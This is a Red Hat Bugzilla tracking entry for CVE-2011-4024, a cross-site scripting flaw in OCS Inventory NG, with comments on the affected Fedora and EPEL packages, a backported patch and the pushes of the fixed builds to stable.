|Summary:||CVE-2011-4024 ocsinventory: XSS flaw|
|Product:||[Other] Security Response||Reporter:||Vincent Danen <vdanen>|
|Component:||vulnerability||Assignee:||Red Hat Product Security <security-response-team>|
|Status:||CLOSED ERRATA||QA Contact:|
|Version:||unspecified||CC:||fedora, jlieskov, xavier|
|Fixed In Version:||Doc Type:||Bug Fix|
|Doc Text:||Story Points:||---|
|Last Closed:||2018-03-22 01:47:59 UTC||Type:||---|
|oVirt Team:||---||RHEL 7.3 requirements from Atomic Host:|
|Cloudforms Team:||---||Target Upstream Version:|
Description Vincent Danen 2011-10-21 22:20:34 UTC
Common Vulnerabilities and Exposures assigned an identifier CVE-2011-4024 to the following vulnerability: Name: CVE-2011-4024 URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4024 Assigned: 20111006 Reference: EXPLOIT-DB:18005 Reference: http://www.exploit-db.com/exploits/18005 Reference: http://www.ocsinventory-ng.org/fr/accueil/nouvelles/version-2-0-2-stable.html Reference: http://www.securityfocus.com/bid/50011 Reference: OSVDB:76135 Reference: http://osvdb.org/76135 Reference: SECUNIA:46311 Reference: http://secunia.com/advisories/46311 Reference: XF:ocsinventoryng-unspecified-xss(70406) Reference: http://xforce.iss.net/xforce/xfdb/70406 Cross-site scripting (XSS) vulnerability in ocsinventory in OCS Inventory NG 2.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Comment 1 Vincent Danen 2011-10-21 22:23:14 UTC
I'm not sure that this affects Fedora (as we ship 1.3.3). Unfortunately, I am completely unable to find any patch for this and the upstream web site is really unhelpful. Since there is no contact info on the site, I'm currently trying to find someone on IRC who may have further information.
Comment 2 Remi Collet 2011-10-22 07:58:46 UTC
Bug also affects version 1.3.3. As an upgrade to 2.0.2 is not immediately possible (major code changes, bundled libraires, ...) I have wrote a patch, inspired from 2.0.2 fix. I'm waiting for upstream feedback and will push a quick update soon. About this issue, GLPI, when synchronized with OCS, is not affected (data are properly cleaned before insert in the GLPI DB).
Comment 3 Jan Lieskovsky 2011-10-25 13:39:07 UTC
This issue affects the versions of the ocsinventory package, as shipped with Fedora release of 14 and 15. -- This issue affects the versions of the ocsinventory package, as shipped within Fedora EPEL 4, Fedora EPEL 5 and Fedora EPEL 6 repositories.
Comment 4 Jan Lieskovsky 2011-10-25 13:46:45 UTC
This issue has been scheduled to be corrected in the following updates: 1) ocsinventory-1.3.3-5.fc16, 2) ocsinventory-1.3.3-5.fc15, 3) ocsinventory-1.3.3-5.fc14, 4) ocsinventory-1.3.3-5.el6, 5) ocsinventory-1.3.3-5.el5, 6) ocsinventory-1.3.3-5.el4. The above packages have been pushed to particular -testing repositories, and upon required level of testing they will be pushed to -stable repositories.
Comment 5 Jan Lieskovsky 2011-10-25 13:50:04 UTC
Relevant upstream patches for the server code (thanks to Remi Collet for providing those):  http://bazaar.launchpad.net/~ocsinventory-core/ocsinventory-ocsreports/stable-2.0/revision/789  http://bazaar.launchpad.net/~ocsinventory-core/ocsinventory-ocsreports/stable-2.0/revision/792
Comment 6 Fedora Update System 2011-11-05 01:18:37 UTC
ocsinventory-1.3.3-5.fc16 has been pushed to the Fedora 16 stable repository. If problems still persist, please make note of it in this bug report.
Comment 7 Fedora Update System 2011-11-14 00:52:03 UTC
ocsinventory-1.3.3-5.fc14 has been pushed to the Fedora 14 stable repository. If problems still persist, please make note of it in this bug report.
Comment 8 Fedora Update System 2011-11-14 00:53:47 UTC
ocsinventory-1.3.3-5.fc15 has been pushed to the Fedora 15 stable repository. If problems still persist, please make note of it in this bug report.
Comment 9 Fedora Update System 2011-11-14 18:56:58 UTC
ocsinventory-1.3.3-5.el4 has been pushed to the Fedora EPEL 4 stable repository. If problems still persist, please make note of it in this bug report.
Comment 10 Fedora Update System 2011-11-14 18:57:25 UTC
ocsinventory-1.3.3-5.el5 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.
Comment 11 Fedora Update System 2011-11-14 18:57:37 UTC
ocsinventory-1.3.3-5.el6 has been pushed to the Fedora EPEL 6 stable repository. If problems still persist, please make note of it in this bug report.